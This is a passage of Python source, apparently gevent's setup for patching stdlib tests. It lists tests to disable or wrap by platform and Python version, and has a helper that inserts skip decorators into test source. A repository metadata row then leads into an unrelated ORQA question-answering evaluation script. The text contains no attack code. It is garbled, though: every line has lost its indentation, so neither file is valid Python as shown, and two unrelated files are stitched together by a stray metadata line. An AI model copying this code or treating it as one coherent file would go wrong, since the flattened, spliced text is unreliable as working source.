'test_socket.BufferIOTest.testRecvFromIntoSmallBuffer',
'test_socket.BufferIOTest.testRecvIntoBytearray',
]
if PY3:
disabled_tests += [
]
if APPVEYOR:
disabled_tests += [
]
if PYPY:
if TRAVIS:
disabled_tests += [
# This sometimes causes a segfault for no apparent reason.
# See https://travis-ci.org/gevent/gevent/jobs/327328704
# Can't reproduce locally.
'test_subprocess.ProcessTestCase.test_universal_newlines_communicate',
]
if RUN_COVERAGE and CFFI_BACKEND:
disabled_tests += [
# This test hangs in this combo for some reason
'test_socket.GeneralModuleTests.test_sendall_interrupted',
# This can get a timeout exception instead of the Alarm
'test_socket.TCPTimeoutTest.testInterruptedTimeout',
# This test sometimes gets the wrong answer (due to changed timing?)
'test_socketserver.SocketServerTest.test_ForkingUDPServer',
# Timing and signals are off, so a handler exception doesn't get raised.
# Seen under libev
'test_signal.InterProcessSignalTests.test_main',
]
if PY2:
if TRAVIS:
disabled_tests += [
# When we moved to group:travis_latest and dist:xenial,
# this started returning a value (33554432L) != 0; presumably
# because of an updated SSL library? Only on CPython.
'test_ssl.ContextTests.test_options',
# When we moved to group:travis_latest and dist:xenial,
# one of the values used started *working* when it was expected to fail.
# The list of values and systems is long and complex, so
# presumably something needs to be updated. Only on PyPy.
'test_ssl.ThreadedTests.test_alpn_protocols',
]
disabled_tests += [
# At least on OSX, this results in connection refused
'test_urllib2_localnet.TestUrlopen.test_https_sni',
]
if sys.version_info[:3] < (2, 7, 16):
# We have 2.7.16 tests; older versions can fail
# to validate some SSL things or are missing important support functions
disabled_tests += [
# Support functions
'test_thread.ThreadRunningTests.test_nt_and_posix_stack_size',
'test_thread.ThreadRunningTests.test_save_exception_state_on_error',
'test_thread.ThreadRunningTests.test_starting_threads',
'test_thread.BarrierTest.test_barrier',
# Broken SSL
'test_urllib2_localnet.TestUrlopen.test_https',
'test_ssl.ContextTests.test__create_stdlib_context',
'test_ssl.ContextTests.test_create_default_context',
'test_ssl.ContextTests.test_options',
]
if PYPY and sys.pypy_version_info[:3] == (7, 3, 0): # pylint:disable=no-member
if OSX:
disabled_tests += [
# This is expected to produce an SSLError, but instead it appears to
# actually work. See above for when it started failing the same way on
# Travis.
'test_ssl.ThreadedTests.test_alpn_protocols',
# This fails, presumably due to the OpenSSL it's compiled with.
'test_ssl.ThreadedTests.test_default_ecdh_curve',
]
def _make_run_with_original(mod_name, func_name):
@contextlib.contextmanager
def with_orig():
mod = __import__(mod_name)
now = getattr(mod, func_name)
from gevent.monkey import get_original
orig = get_original(mod_name, func_name)
try:
setattr(mod, func_name, orig)
yield
finally:
setattr(mod, func_name, now)
return with_orig
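# Illustrative usage (not part of the original file; the test key below is
# hypothetical). The returned context manager temporarily restores the
# unpatched stdlib function while a wrapped test runs, e.g.:
#   wrapped_tests['test_signal.ItimerTest.test_itimer_real'] = _make_run_with_original('time', 'sleep')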
@contextlib.contextmanager
def _gc_at_end():
try:
yield
finally:
import gc
gc.collect()
gc.collect()
@contextlib.contextmanager
def _flaky_socket_timeout():
import socket
try:
yield
except socket.timeout:
flaky.reraiseFlakyTestTimeout()
# Map from FQN to a context manager that will be wrapped around
# that test.
wrapped_tests = {
}
class _PatchedTest(object):
def __init__(self, test_fqn):
self._patcher = wrapped_tests[test_fqn]
def __call__(self, orig_test_fn):
@functools.wraps(orig_test_fn)
def test(*args, **kwargs):
with self._patcher():
return orig_test_fn(*args, **kwargs)
return test
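# Sketch of how this decorator is meant to be applied (illustrative only;
# the test name is hypothetical). An entry in wrapped_tests supplies the
# context manager, and _PatchedTest rewraps the test method with it:
#   wrapped_tests['test_foo.SomeCase.test_bar'] = _gc_at_end
#   SomeCase.test_bar = _PatchedTest('test_foo.SomeCase.test_bar')(SomeCase.test_bar)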
if sys.version_info[:3] <= (2, 7, 11):
disabled_tests += [
# These were added/fixed in 2.7.12+
'test_ssl.ThreadedTests.test__https_verify_certificates',
'test_ssl.ThreadedTests.test__https_verify_envvar',
]
if OSX:
disabled_tests += [
'test_subprocess.POSIXProcessTestCase.test_run_abort',
# causes Mac OS X to show "Python crashes" dialog box which is annoying
]
if WIN:
disabled_tests += [
# Issue with Unix vs DOS newlines in the file vs from the server
'test_ssl.ThreadedTests.test_socketserver',
# On appveyor, this sometimes produces 'A non-blocking socket
# operation could not be completed immediately', followed by
# 'No connection could be made because the target machine
# actively refused it'
'test_socket.NonBlockingTCPTests.testAccept',
]
# These are a problem on 3.5; on 3.6+ they wind up getting (accidentally) disabled.
wrapped_tests.update({
'test_socket.SendfileUsingSendTest.testWithTimeout': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testOffset': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testRegularFile': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testCount': _flaky_socket_timeout,
})
if PYPY:
disabled_tests += [
# Does not exist in the CPython test suite, tests for a specific bug
# in PyPy's forking. Only runs on linux and is specific to the PyPy
# implementation of subprocess (possibly explains the extra parameter to
# _execute_child)
'test_subprocess.ProcessTestCase.test_failed_child_execute_fd_leak',
# On some platforms, this returns "zlib_compression", but the test is looking for
# "ZLIB"
'test_ssl.ThreadedTests.test_compression',
# These are flaky, apparently a race condition? Began with PyPy 2.7-7 and 3.6-7
'test_asyncore.TestAPI_UsePoll.test_handle_error',
'test_asyncore.TestAPI_UsePoll.test_handle_read',
]
if WIN:
disabled_tests += [
# Starting in 7.3.1 on Windows, this stopped raising ValueError; it appears to
# be a bug in PyPy.
'test_signal.WakeupFDTests.test_invalid_fd',
# Likewise for 7.3.1. See the comments for PY35
'test_socket.GeneralModuleTests.test_sock_ioctl',
]
if PY36:
disabled_tests += [
# These are flaky, beginning in 3.6-alpha 7.0, not finding some flag
# set, apparently a race condition
'test_asyncore.TestAPI_UseIPv6Poll.test_handle_accept',
'test_asyncore.TestAPI_UseIPv6Poll.test_handle_accepted',
'test_asyncore.TestAPI_UseIPv6Poll.test_handle_close',
'test_asyncore.TestAPI_UseIPv6Poll.test_handle_write',
'test_asyncore.TestAPI_UseIPv6Select.test_handle_read',
# These are reporting 'ssl has no attribute ...'
# This could just be an OSX thing
'test_ssl.ContextTests.test__create_stdlib_context',
'test_ssl.ContextTests.test_create_default_context',
'test_ssl.ContextTests.test_get_ciphers',
'test_ssl.ContextTests.test_options',
'test_ssl.ContextTests.test_constants',
# These tend to hang for some reason, probably not properly
# closed sockets.
'test_socketserver.SocketServerTest.test_write',
# This uses ctypes to do funky things including using ptrace,
# it hangs
'test_subprocess.ProcessTestCase.test_child_terminated_in_stopped_state',
# Certificate errors; need updated test
'test_urllib2_localnet.TestUrlopen.test_https',
]
# Generic Python 3
if PY3:
disabled_tests += [
# Triggers the crash reporter
'test_threading.SubinterpThreadingTests.test_daemon_threads_fatal_error',
# Relies on an implementation detail, Thread._tstate_lock
'test_threading.ThreadTests.test_tstate_lock',
# Relies on an implementation detail (reprs); we have our own version
'test_threading.ThreadTests.test_various_ops',
'test_threading.ThreadTests.test_various_ops_large_stack',
'test_threading.ThreadTests.test_various_ops_small_stack',
# Relies on Event having a _cond and an _reset_internal_locks()
# XXX: These are commented out in the source code of test_threading because
# this doesn't work.
# 'lock_tests.EventTests.test_reset_internal_locks',
# Python bug 13502. We may or may not suffer from this as it's
# basically a timing race condition.
# XXX Same as above
# 'lock_tests.EventTests.test_set_and_clear',
# These tests want to assert on the type of the class that implements
# `Popen.stdin`; we use a FileObject, but they expect different subclasses
# from the `io` module
'test_subprocess.ProcessTestCase.test_io_buffered_by_default',
'test_subprocess.ProcessTestCase.test_io_unbuffered_works',
# 3.3 exposed the `endtime` argument to wait accidentally.
# It is documented as deprecated and not to be used since 3.4.
# This test in 3.6.3 wants to use it though, and we don't have it.
'test_subprocess.ProcessTestCase.test_wait_endtime',
# These all want to inspect the string value of an exception raised
# by the exec() call in the child. The _posixsubprocess module arranges
# for better exception handling and printing than we do.
'test_subprocess.POSIXProcessTestCase.test_exception_bad_args_0',
'test_subprocess.POSIXProcessTestCase.test_exception_bad_executable',
'test_subprocess.POSIXProcessTestCase.test_exception_cwd',
# Relies on a 'fork_exec' attribute that we don't provide
'test_subprocess.POSIXProcessTestCase.test_exception_errpipe_bad_data',
'test_subprocess.POSIXProcessTestCase.test_exception_errpipe_normal',
# Python 3 fixed a bug if the stdio file descriptors were closed;
# we still have that bug
'test_subprocess.POSIXProcessTestCase.test_small_errpipe_write_fd',
# Relies on implementation details (some of these tests were added in 3.4,
# but PyPy3 is also shipping them.)
'test_socket.GeneralModuleTests.test_SocketType_is_socketobject',
'test_socket.GeneralModuleTests.test_dealloc_warn',
'test_socket.GeneralModuleTests.test_repr',
'test_socket.GeneralModuleTests.test_str_for_enums',
'test_socket.GeneralModuleTests.testGetaddrinfo',
]
if TRAVIS:
disabled_tests += [
# test_cwd_with_relative_executable tends to fail
# on Travis...it looks like the test processes are stepping
# on each other and messing up their temp directories. We tend to get things like
# saved_dir = os.getcwd()
# FileNotFoundError: [Errno 2] No such file or directory
'test_subprocess.ProcessTestCase.test_cwd_with_relative_arg',
'test_subprocess.ProcessTestCaseNoPoll.test_cwd_with_relative_arg',
'test_subprocess.ProcessTestCase.test_cwd_with_relative_executable',
# In 3.7 and 3.8 on Travis CI, this appears to take the full 3 seconds.
# Can't reproduce it locally. We have our own copy of this that takes
# timing on CI into account.
'test_subprocess.RunFuncTestCase.test_run_with_shell_timeout_and_capture_output',
]
disabled_tests += [
# XXX: BUG: We simply don't handle this correctly. On CPython,
# we wind up raising a BlockingIOError and then
# BrokenPipeError and then some random TypeErrors, all on the
# server. CPython 3.5 goes directly to socket.send() (via
# socket.makefile), whereas CPython 3.6 uses socket.sendall().
# On PyPy, the behaviour is much worse: we hang indefinitely, perhaps exposing a problem
# with our signal handling.
# In actuality, though, this test doesn't fully test the EINTR it expects
# to under gevent (because of its EWOULDBLOCK retry behaviour).
# Instead, the failures were all due to `pthread_kill` trying to send a signal
# to a greenlet instead of a real thread. The solution is to deliver the signal
# to the real thread by letting it get the correct ID, and we previously
# used make_run_with_original to make it do that.
#
# But now that we have disabled our wrappers around Thread.join() in favor
# of the original implementation, that causes problems:
# background.join() thinks that it is the current thread, and won't let it
# be joined.
'test_wsgiref.IntegrationTests.test_interrupted_write',
]
# PyPy3 3.5.5 v5.8-beta
if PYPY3:
disabled_tests += [
# This raises 'RuntimeError: reentrant call' when exiting the
# process tries to close the stdout stream; no other platform does this.
# Seen in both 3.3 and 3.5 (5.7 and 5.8)
'test_signal.SiginterruptTest.test_siginterrupt_off',
]
if PYPY and PY3:
disabled_tests += [
# This fails to close all the FDs, at least on CI. On OS X, many of the
# POSIXProcessTestCase fd tests have issues.
'test_subprocess.POSIXProcessTestCase.test_close_fds_when_max_fd_is_lowered',
# This has the wrong constants in 5.8 (but worked in 5.7), at least on
# OS X. It finds "zlib compression" but expects "ZLIB".
'test_ssl.ThreadedTests.test_compression',
# The below are new with 5.10.1
# This gets an EOF in violation of protocol; again, even without gevent
# (at least on OS X; it's less consistent about that on travis)
'test_ssl.NetworkedBIOTests.test_handshake',
# This passes various "invalid" strings and expects a ValueError; not sure why
# we don't see errors on CPython.
'test_subprocess.ProcessTestCase.test_invalid_env',
]
if OSX:
disabled_tests += [
# These all fail with "invalid literal for int() with base 10: b''"
'test_subprocess.POSIXProcessTestCase.test_close_fds',
'test_subprocess.POSIXProcessTestCase.test_close_fds_after_preexec',
'test_subprocess.POSIXProcessTestCase.test_pass_fds',
'test_subprocess.POSIXProcessTestCase.test_pass_fds_inheritable',
'test_subprocess.POSIXProcessTestCase.test_pipe_cloexec',
# The below are new with 5.10.1
# These fail with 'OSError: received malformed or improperly truncated ancillary data'
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen0',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen0Plus1',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen1',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen2Minus1',
# Using the provided High Sierra binary, these fail with
# 'ValueError: invalid protocol version _SSLMethod.PROTOCOL_SSLv3'.
# gevent code isn't involved and running them unpatched has the same issue.
'test_ssl.ContextTests.test_constructor',
'test_ssl.ContextTests.test_protocol',
'test_ssl.ContextTests.test_session_stats',
'test_ssl.ThreadedTests.test_echo',
'test_ssl.ThreadedTests.test_protocol_sslv23',
'test_ssl.ThreadedTests.test_protocol_sslv3',
'test_ssl.ThreadedTests.test_protocol_tlsv1',
'test_ssl.ThreadedTests.test_protocol_tlsv1_1',
# Similar, they fail without monkey-patching.
'test_ssl.TestPostHandshakeAuth.test_pha_no_pha_client',
'test_ssl.TestPostHandshakeAuth.test_pha_optional',
'test_ssl.TestPostHandshakeAuth.test_pha_required',
# This gets None instead of http1.1, even without gevent
'test_ssl.ThreadedTests.test_npn_protocols',
# This fails to decode a filename even without gevent,
# at least on High Sierra. Newer versions of the tests actually skip this.
'test_httpservers.SimpleHTTPServerTestCase.test_undecodable_filename',
]
disabled_tests += [
# This seems to be a buffering issue? Something isn't
# getting flushed. (The output is wrong). Under PyPy3 5.7,
# I couldn't reproduce it locally in Ubuntu 16 in a VM
# or a laptop with OS X. Under 5.8.0, I can reproduce it, but only
# when run by the testrunner, not when run manually on the command line,
# so something is changing in stdout buffering in those situations.
'test_threading.ThreadJoinOnShutdown.test_2_join_in_forked_process',
'test_threading.ThreadJoinOnShutdown.test_1_join_in_forked_process',
]
if TRAVIS:
disabled_tests += [
# Likewise, but I haven't produced it locally.
'test_threading.ThreadJoinOnShutdown.test_1_join_on_shutdown',
]
if PYPY:
wrapped_tests.update({
# XXX: gevent: The error that was raised by that last call
# left a socket open on the server or client. The server gets
# to http/server.py(390)handle_one_request and blocks on
# self.rfile.readline which apparently is where the SSL
# handshake is done. That results in the exception being
# raised on the client above, but apparently *not* on the
# server. Consequently it sits trying to read from that
# socket. On CPython, when the client socket goes out of scope
# it is closed and the server raises an exception, closing the
# socket. On PyPy, we need a GC cycle for that to happen.
# Without the socket being closed and exception being raised,
# the server cannot be stopped (it runs each request in the
# same thread that would notice it had been stopped), and so
# the cleanup method added by start_https_server to stop the
# server blocks "forever".
# This is an important test, so rather than skip it in patched_tests_setup,
# we do the gc before we return.
'test_urllib2_localnet.TestUrlopen.test_https_with_cafile': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_command': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_handler': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_header_close': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_internal_key_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_request_line_trimming': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_return_custom_status': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_return_header_keep_alive': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_send_blank': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_send_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_bogus': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_digits': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_invalid': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_none': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_none_get': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_get': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_get': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_head': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_invalid_requests': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_path_without_leading_slash': _gc_at_end,
'test_httpservers.CGIHTTPServerTestCase.test_invaliduri': _gc_at_end,
'test_httpservers.CGIHTTPServerTestCase.test_issue19435': _gc_at_end,
'test_httplib.TunnelTests.test_connect': _gc_at_end,
'test_httplib.SourceAddressTest.testHTTPConnectionSourceAddress': _gc_at_end,
# Unclear
'test_urllib2_localnet.ProxyAuthTests.test_proxy_with_bad_password_raises_httperror': _gc_at_end,
'test_urllib2_localnet.ProxyAuthTests.test_proxy_with_no_password_raises_httperror': _gc_at_end,
})
if PY35:
disabled_tests += [
'test_subprocess.ProcessTestCase.test_threadsafe_wait',
# XXX: It seems that threading.Timer is not being greened properly, possibly
# due to a similar issue to what gevent.threading documents for normal threads.
# In any event, this test hangs forever
'test_subprocess.POSIXProcessTestCase.test_preexec_errpipe_does_not_double_close_pipes',
# Subclasses Popen, and overrides _execute_child. Expects things to be done
# in a particular order in an exception case, but we don't follow that
# exact order
'test_selectors.PollSelectorTestCase.test_above_fd_setsize',
# This test attempts to open many many file descriptors and
# poll on them, expecting them all to be ready at once. But
# libev limits the number of events it will return at once. Specifically,
# on linux with epoll, it returns a max of 64 (ev_epoll.c).
# XXX: Hangs (Linux only)
'test_socket.NonBlockingTCPTests.testInitNonBlocking',
# We don't handle the Linux-only SOCK_NONBLOCK option
'test_socket.NonblockConstantTest.test_SOCK_NONBLOCK',
# Tries to use multiprocessing which doesn't quite work in
# monkey_test module (Windows only)
'test_socket.TestSocketSharing.testShare',
# Windows-only: Sockets have a 'ioctl' method in Python 3
# implemented in the C code. This test tries to check
# for the presence of the method in the class, which we don't
# have because we don't inherit the C implementation. But
# it should be found at runtime.
'test_socket.GeneralModuleTests.test_sock_ioctl',
# XXX This fails for an unknown reason
'test_httplib.HeaderTests.test_parse_all_octets',
]
if OSX:
disabled_tests += [
# These raise "OSError: 12 Cannot allocate memory" on both
# patched and unpatched runs
'test_socket.RecvmsgSCMRightsStreamTest.testFDPassEmpty',
]
if TRAVIS:
# This has been seen to produce "Inconsistency detected by
# ld.so: dl-open.c: 231: dl_open_worker: Assertion
# `_dl_debug_initialize (0, args->nsid)->r_state ==
# RT_CONSISTENT' failed!" and fail.
disabled_tests += [
'test_threading.ThreadTests.test_is_alive_after_fork',
]
if TRAVIS:
disabled_tests += [
'test_subprocess.ProcessTestCase.test_double_close_on_error',
# This test is racy or OS-dependent. It passes locally (sufficiently fast machine)
# but fails under Travis
]
if PY35:
disabled_tests += [
# XXX: Hangs
'test_ssl.ThreadedTests.test_nonblocking_send',
'test_ssl.ThreadedTests.test_socketserver',
# Uses direct sendfile, doesn't properly check for it being enabled
'test_socket.GeneralModuleTests.test__sendfile_use_sendfile',
# Relies on the regex of the repr having the locked state (TODO: it'd be nice if
# we did that).
# XXX: These are commented out in the source code of test_threading because
# this doesn't work.
# 'lock_tests.LockTests.test_locked_repr',
# 'lock_tests.LockTests.test_repr',
# This test opens a socket, creates a new socket with the same fileno,
# closes the original socket (and hence fileno) and then
# expects that the calling setblocking() on the duplicate socket
# will raise an error. Our implementation doesn't work that way because
# setblocking() doesn't actually touch the file descriptor.
# That's probably OK because this was a GIL state error in CPython
# see https://github.com/python/cpython/commit/fa22b29960b4e683f4e5d7e308f674df2620473c
'test_socket.TestExceptions.test_setblocking_invalidfd',
]
if ARES:
disabled_tests += [
# These raise different errors or can't resolve
# the IP address correctly
'test_socket.GeneralModuleTests.test_host_resolution',
'test_socket.GeneralModuleTests.test_getnameinfo',
]
if sys.version_info[1] == 5:
disabled_tests += [
# This test tends to time out, but only under 3.5, not under
# 3.6 or 3.7. Seen with both libev and libuv
'test_socket.SendfileUsingSendTest.testWithTimeoutTriggeredSend',
]
if sys.version_info[:3] <= (3, 5, 1):
# Python issue 26499 was fixed in 3.5.2 and these tests were added.
disabled_tests += [
'test_httplib.BasicTest.test_mixed_reads',
'test_httplib.BasicTest.test_read1_bound_content_length',
'test_httplib.BasicTest.test_read1_content_length',
'test_httplib.BasicTest.test_readline_bound_content_length',
'test_httplib.BasicTest.test_readlines_content_length',
]
if PY36:
disabled_tests += [
'test_threading.MiscTestCase.test__all__',
]
# We don't actually implement socket._sendfile_use_sendfile,
# so these tests, which think they're using that and os.sendfile,
# fail.
disabled_tests += [
'test_socket.SendfileUsingSendfileTest.testCount',
'test_socket.SendfileUsingSendfileTest.testCountSmall',
'test_socket.SendfileUsingSendfileTest.testCountWithOffset',
'test_socket.SendfileUsingSendfileTest.testOffset',
'test_socket.SendfileUsingSendfileTest.testRegularFile',
'test_socket.SendfileUsingSendfileTest.testWithTimeout',
'test_socket.SendfileUsingSendfileTest.testEmptyFileSend',
'test_socket.SendfileUsingSendfileTest.testNonBlocking',
'test_socket.SendfileUsingSendfileTest.test_errors',
]
# Ditto
disabled_tests += [
'test_socket.GeneralModuleTests.test__sendfile_use_sendfile',
]
disabled_tests += [
# This test requires Linux >= 4.3. When we were running 'dist:
# trusty' on the 4.4 kernel, it passed (~July 2017). But when
# trusty became the default dist in September 2017 and updated
# the kernel to 4.11.6, it began failing. It fails on `res =
# op.recv(assoclen + len(plain) + taglen)` (where 'op' is the
# client socket) with 'OSError: [Errno 22] Invalid argument'
# for unknown reasons. This is *after* having successfully
# called `op.sendmsg_afalg`. Post 3.6.0, what we test with,
# the test was changed to require Linux 4.9 and the data was changed,
# so this is not our fault. We should eventually update this when we
# update our 3.6 version.
# See https://bugs.python.org/issue29324
'test_socket.LinuxKernelCryptoAPI.test_aead_aes_gcm',
]
if PY37:
disabled_tests += [
# These want to use the private '_communicate' method, which
# our Popen doesn't have.
'test_subprocess.MiscTests.test_call_keyboardinterrupt_no_kill',
'test_subprocess.MiscTests.test_context_manager_keyboardinterrupt_no_kill',
'test_subprocess.MiscTests.test_run_keyboardinterrupt_no_kill',
# This wants to check that the underlying fileno is blocking,
# but it isn't.
'test_socket.NonBlockingTCPTests.testSetBlocking',
# 3.7b2 made it impossible to instantiate SSLSocket objects
# directly, and this tests for that, but we don't follow that change.
'test_ssl.BasicSocketTests.test_private_init',
# 3.7b2 made a change to this test that on the surface looks incorrect,
# but it passes when they run it and fails when we do. It's not
# clear why.
'test_ssl.ThreadedTests.test_check_hostname_idn',
# These appear to hang, haven't investigated why
'test_ssl.SimpleBackgroundTests.test_get_server_certificate',
# Probably the same as NetworkConnectionNoServer.test_create_connection_timeout
'test_socket.NetworkConnectionNoServer.test_create_connection',
# Internals of the threading module that change.
'test_threading.ThreadTests.test_finalization_shutdown',
'test_threading.ThreadTests.test_shutdown_locks',
# Expects a deprecation warning we don't raise
'test_threading.ThreadTests.test_old_threading_api',
# This tries to use threading.interrupt_main() from a new Thread;
# but of course that's actually the same thread and things don't
# work as expected.
'test_threading.InterruptMainTests.test_interrupt_main_subthread',
'test_threading.InterruptMainTests.test_interrupt_main_noerror',
# TLS1.3 seems flaky
'test_ssl.ThreadedTests.test_wrong_cert_tls13',
]
if sys.version_info < (3, 7, 6):
disabled_tests += [
# Earlier versions parse differently so the newer test breaks
'test_ssl.BasicSocketTests.test_parse_all_sans',
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2013_4238',
]
if APPVEYOR:
disabled_tests += [
]
if PY38:
disabled_tests += [
# This one seems very strict: doesn't want a pathlike
# first argument when shell is true.
'test_subprocess.RunFuncTestCase.test_run_with_pathlike_path',
# This tests for a warning we don't raise.
'test_subprocess.RunFuncTestCase.test_bufsize_equal_one_binary_mode',
# This compares the output of threading.excepthook with
# data constructed in Python. But excepthook is implemented in C
# and can't see the patched threading.get_ident() we use, so the
# output doesn't match.
'test_threading.ExceptHookTests.test_excepthook_thread_None',
]
if sys.version_info < (3, 8, 1):
disabled_tests += [
# Earlier versions parse differently so the newer test breaks
'test_ssl.BasicSocketTests.test_parse_all_sans',
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2013_4238',
]
# if 'signalfd' in os.environ.get('GEVENT_BACKEND', ''):
# # tests that don't interact well with signalfd
# disabled_tests.extend([
# 'test_signal.SiginterruptTest.test_siginterrupt_off',
# 'test_socketserver.SocketServerTest.test_ForkingTCPServer',
# 'test_socketserver.SocketServerTest.test_ForkingUDPServer',
# 'test_socketserver.SocketServerTest.test_ForkingUnixStreamServer'])
# LibreSSL reports OPENSSL_VERSION_INFO (2, 0, 0, 0, 0) regardless of its version,
# so this is known to fail on some distros. We don't want to detect this because we
# don't want to trigger the side-effects of importing ssl prematurely if we will
# be monkey-patching, so we skip this test everywhere. It doesn't do much for us
# anyway.
disabled_tests += [
'test_ssl.BasicSocketTests.test_openssl_version'
]
if OSX:
disabled_tests += [
# This sometimes produces OSError: Errno 40: Message too long
'test_socket.RecvmsgIntoTCPTest.testRecvmsgIntoGenerator',
]
# Now build up the data structure we'll use to actually find disabled tests
# to avoid a linear scan for every file (it seems the list could get quite large)
# (First, freeze the source list to make sure it isn't modified anywhere)
def _build_test_structure(sequence_of_tests):
_disabled_tests = frozenset(sequence_of_tests)
disabled_tests_by_file = collections.defaultdict(set)
for file_case_meth in _disabled_tests:
file_name, _case, _meth = file_case_meth.split('.')
by_file = disabled_tests_by_file[file_name]
by_file.add(file_case_meth)
return disabled_tests_by_file
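# For example (hypothetical input), _build_test_structure(
#   ['test_ssl.ContextTests.test_options'])
# yields a mapping like {'test_ssl': {'test_ssl.ContextTests.test_options'}},
# so the patching step below does one dict lookup per file instead of
# scanning every disabled name.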
_disabled_tests_by_file = _build_test_structure(disabled_tests)
_wrapped_tests_by_file = _build_test_structure(wrapped_tests)
def disable_tests_in_source(source, filename):
# Source and filename are both native strings.
if filename.startswith('./'):
# turn "./test_socket.py" (used for auto-complete) into "test_socket.py"
filename = filename[2:]
if filename.endswith('.py'):
filename = filename[:-3]
# XXX ignoring TestCase class name (just using function name).
# Maybe we should do this with the AST, or even after the test is
# imported.
my_disabled_tests = _disabled_tests_by_file.get(filename, ())
my_wrapped_tests = _wrapped_tests_by_file.get(filename, {})
if my_disabled_tests or my_wrapped_tests:
# Insert our imports early in the file.
# If we do it on a def-by-def basis, we can break syntax
# if the function is already decorated
pattern = r'^import .*'
replacement = r'from gevent.testing import patched_tests_setup as _GEVENT_PTS;'
replacement += r'import unittest as _GEVENT_UTS;'
replacement += r'\g<0>'
source, n = re.subn(pattern, replacement, source, 1, re.MULTILINE)
print("Added imports", n)
# Test cases will always be indented some,
# so use [ \t]+. Without indentation, test_main, commonly used as the
# __main__ function at the top level, could get matched. \s matches
# newlines even in MULTILINE mode so it would still match that.
my_disabled_testcases = set()
for test in my_disabled_tests:
testcase = test.split('.')[-1]
my_disabled_testcases.add(testcase)
# def foo_bar(self)
# ->
# @_GEVENT_UTS.skip('Removed by patched_tests_setup')
# def foo_bar(self)
pattern = r"^([ \t]+)def " + testcase
replacement = r"\1@_GEVENT_UTS.skip('Removed by patched_tests_setup: %s')\n" % (test,)
replacement += r"\g<0>"
source, n = re.subn(pattern, replacement, source, 0, re.MULTILINE)
print('Skipped %s (%d)' % (testcase, n), file=sys.stderr)
for test in my_wrapped_tests:
testcase = test.split('.')[-1]
if testcase in my_disabled_testcases:
print("Not wrapping %s because it is skipped" % (test,))
continue
# def foo_bar(self)
# ->
# @_GEVENT_PTS._PatchedTest('file.Case.name')
# def foo_bar(self)
pattern = r"^([ \t]+)def " + testcase
replacement = r"\1@_GEVENT_PTS._PatchedTest('%s')\n" % (test,)
replacement += r"\g<0>"
source, n = re.subn(pattern, replacement, source, 0, re.MULTILINE)
print('Wrapped %s (%d)' % (testcase, n), file=sys.stderr)
return source
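# Illustrative usage (not part of the original file; the filename is
# hypothetical). The test runner reads a stdlib test module and rewrites
# its source so disabled tests are skipped and wrapped tests decorated:
#   with open('./test_socket.py') as f:
#       patched = disable_tests_in_source(f.read(), './test_socket.py')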
| [
"[email protected]"
] | |
5790747bf3bb59cf374317ac2044970705d035fb | 3213373f90f10c60667c26a56d30a9202e1b9ae3 | /language/orqa/predict/orqa_eval.py | 1fe260eb6edd190f0e5df545f0ad78f7fc8a06b0 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | Mistobaan/language | 59a481b3ff6a7c7beada2361aef7173fbfd355a4 | 394675a831ae45ea434abb50655e7975c68a7121 | refs/heads/master | 2022-11-29T14:10:37.590205 | 2020-08-13T22:28:13 | 2020-08-13T22:31:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,448 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""ORQA evaluation."""
import json
import os
from absl import flags
from language.orqa.models import orqa_model
from language.orqa.utils import eval_utils
import six
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
flags.DEFINE_string("model_dir", None, "Model directory.")
flags.DEFINE_string("dataset_path", None, "Data path.")
def main(_):
predictor = orqa_model.get_predictor(FLAGS.model_dir)
example_count = 0
correct_count = 0
predictions_path = os.path.join(FLAGS.model_dir, "predictions.jsonl")
with tf.io.gfile.GFile(predictions_path, "w") as predictions_file:
with tf.io.gfile.GFile(FLAGS.dataset_path) as dataset_file:
for line in dataset_file:
example = json.loads(line)
question = example["question"]
answers = example["answer"]
predictions = predictor(question)
predicted_answer = six.ensure_text(
predictions["answer"], errors="ignore")
is_correct = eval_utils.is_correct(
answers=[six.ensure_text(a) for a in answers],
prediction=predicted_answer,
is_regex=False)
predictions_file.write(
json.dumps(
dict(
question=question,
prediction=predicted_answer,
predicted_context=six.ensure_text(
predictions["orig_block"], errors="ignore"),
correct=is_correct,
answer=answers)))
predictions_file.write("\n")
